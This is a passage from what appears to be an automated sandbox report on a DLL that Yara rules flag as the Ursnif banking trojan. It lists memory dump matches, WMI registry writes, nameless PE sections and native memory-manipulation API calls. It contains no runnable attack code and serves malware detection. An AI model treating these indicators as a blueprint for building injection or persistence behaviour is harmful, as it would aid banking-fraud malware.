                      Source: Yara matchFile source: 00000002.00000003.375609486.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468055904.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364525253.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364645701.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414418494.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 1132, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3528, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 572, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6420, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5852, type: MEMORYSTR
                      Source: Yara matchFile source: 12.2.rundll32.exe.3380000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.rundll32.exe.d50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.rundll32.exe.4420000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.rundll32.exe.c70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.5e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.ee0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.a90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.33c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rundll32.exe.34b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.e90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.rundll32.exe.30f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.e70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.a10000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.ed0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.6a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.e70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.rundll32.exe.ec0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.d40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.646505839.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.647248023.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.420703816.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.369842357.0000000004420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.429260721.0000000000B90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.446457237.0000000002FF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.395181120.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.304746856.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.644375086.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.644275596.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.404550110.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.458755671.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.325365679.0000000003380000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.358824695.0000000000A10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.413264520.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.330683030.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.646583406.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.298453588.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.342607248.00000000033C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.290124643.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.346644009.0000000000E90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.378757708.00000000034B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.365645310.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.645252474.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.385594405.0000000000400000.00000040.00000001.sdmp, type: MEMORY

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000003.364222279.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468105899.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468188061.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364616223.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.649016082.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375358568.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.652107409.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414632336.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375444270.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468218845.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.651754848.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375275190.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364320937.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364389953.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375222083.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468255149.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414450322.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414502049.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375580970.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.333121153.0000000006AF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.648129313.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468276277.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375181159.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364453388.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414320429.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414602020.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468293136.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414538088.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468154438.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375508831.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414382047.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364561415.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375609486.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468055904.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364525253.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364645701.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414418494.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 1132, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3528, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 572, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6420, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5852, type: MEMORYSTR
                      Source: Yara matchFile source: 12.2.rundll32.exe.3380000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.rundll32.exe.d50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.rundll32.exe.4420000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.rundll32.exe.c70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.5e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.ee0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.a90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.33c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rundll32.exe.34b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.e90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.rundll32.exe.30f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.e70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.a10000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.ed0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.6a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.e70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.rundll32.exe.ec0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.d40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.646505839.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.647248023.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.420703816.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.369842357.0000000004420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.429260721.0000000000B90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.446457237.0000000002FF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.395181120.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.304746856.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.644375086.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.644275596.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.404550110.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.458755671.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.325365679.0000000003380000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.358824695.0000000000A10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.413264520.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.330683030.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.646583406.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.298453588.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.342607248.00000000033C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.290124643.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.346644009.0000000000E90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.378757708.00000000034B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.365645310.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.645252474.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.385594405.0000000000400000.00000040.00000001.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      PE file has nameless sectionsShow sources
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: qT9Qk5aKTk.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_004021540_2_00402154
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00EC40940_2_00EC4094
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00EC97F20_2_00EC97F2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00ECB11C0_2_00ECB11C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_005E21542_2_005E2154
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00C840942_2_00C84094
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00C897F22_2_00C897F2
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00C8B11C2_2_00C8B11C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04B3409410_2_04B34094
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04B397F210_2_04B397F2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04B3B11C10_2_04B3B11C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0547B11C12_2_0547B11C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_054797F212_2_054797F2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0547409412_2_05474094
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04F4409417_2_04F44094
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04F497F217_2_04F497F2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04F4B11C17_2_04F4B11C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_052DB11C29_2_052DB11C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_052D97F229_2_052D97F2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_052D409429_2_052D4094
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 31_2_046B409431_2_046B4094
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 31_2_046BB11C31_2_046BB11C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 31_2_046B97F231_2_046B97F2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 31_2_046B44A231_2_046B44A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 31_2_046B554A31_2_046B554A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 31_2_046B27A731_2_046B27A7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00401D9F NtMapViewOfSection,0_2_00401D9F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00401EB5 GetProcAddress,NtCreateSection,memset,0_2_00401EB5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00402375 NtQueryVirtualMemory,0_2_00402375
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00EC83B7 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_00EC83B7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00ECB341 NtQueryVirtualMemory,0_2_00ECB341
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E40285 NtProtectVirtualMemory,0_2_00E40285
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E4009C NtAllocateVirtualMemory,0_2_00E4009C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E40066 NtAllocateVirtualMemory,0_2_00E40066
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_005E1D9F NtMapViewOfSection,2_2_005E1D9F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_005E1EB5 GetProcAddress,NtCreateSection,memset,2_2_005E1EB5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_005E2375 NtQueryVirtualMemory,2_2_005E2375
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00C883B7 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_00C883B7
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00C8B341 NtQueryVirtualMemory,2_2_00C8B341
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF009C NtAllocateVirtualMemory,3_2_00BF009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF0066 NtAllocateVirtualMemory,3_2_00BF0066
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF0285 NtProtectVirtualMemory,3_2_00BF0285
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0097009C NtAllocateVirtualMemory,5_2_0097009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00970066 NtAllocateVirtualMemory,5_2_00970066
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00970285 NtProtectVirtualMemory,5_2_00970285
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00CA0066 NtAllocateVirtualMemory,7_2_00CA0066
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00CA0285 NtProtectVirtualMemory,7_2_00CA0285
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00CA009C NtAllocateVirtualMemory,7_2_00CA009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00C90285 NtProtectVirtualMemory,9_2_00C90285
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00C90066 NtAllocateVirtualMemory,9_2_00C90066
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00C9009C NtAllocateVirtualMemory,9_2_00C9009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04B383B7 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,10_2_04B383B7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04B3B341 NtQueryVirtualMemory,10_2_04B3B341
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00A80285 NtProtectVirtualMemory,10_2_00A80285
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00A8009C NtAllocateVirtualMemory,10_2_00A8009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00A80066 NtAllocateVirtualMemory,10_2_00A80066
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_054783B7 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,12_2_054783B7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0547B341 NtQueryVirtualMemory,12_2_0547B341
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_03370066 NtAllocateVirtualMemory,12_2_03370066
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0337009C NtAllocateVirtualMemory,12_2_0337009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_03370285 NtProtectVirtualMemory,12_2_03370285
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04F483B7 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,17_2_04F483B7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04F4B341 NtQueryVirtualMemory,17_2_04F4B341
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_033B009C NtAllocateVirtualMemory,20_2_033B009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_033B0066 NtAllocateVirtualMemory,20_2_033B0066
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_033B0285 NtProtectVirtualMemory,20_2_033B0285
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_00A00066 NtAllocateVirtualMemory,24_2_00A00066
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_043F009C NtAllocateVirtualMemory,26_2_043F009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_043F0066 NtAllocateVirtualMemory,26_2_043F0066
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_043F0285 NtProtectVirtualMemory,26_2_043F0285
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 27_2_00BC009C NtAllocateVirtualMemory,27_2_00BC009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 27_2_00BC0285 NtProtectVirtualMemory,27_2_00BC0285
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 27_2_00BC0066 NtAllocateVirtualMemory,27_2_00BC0066
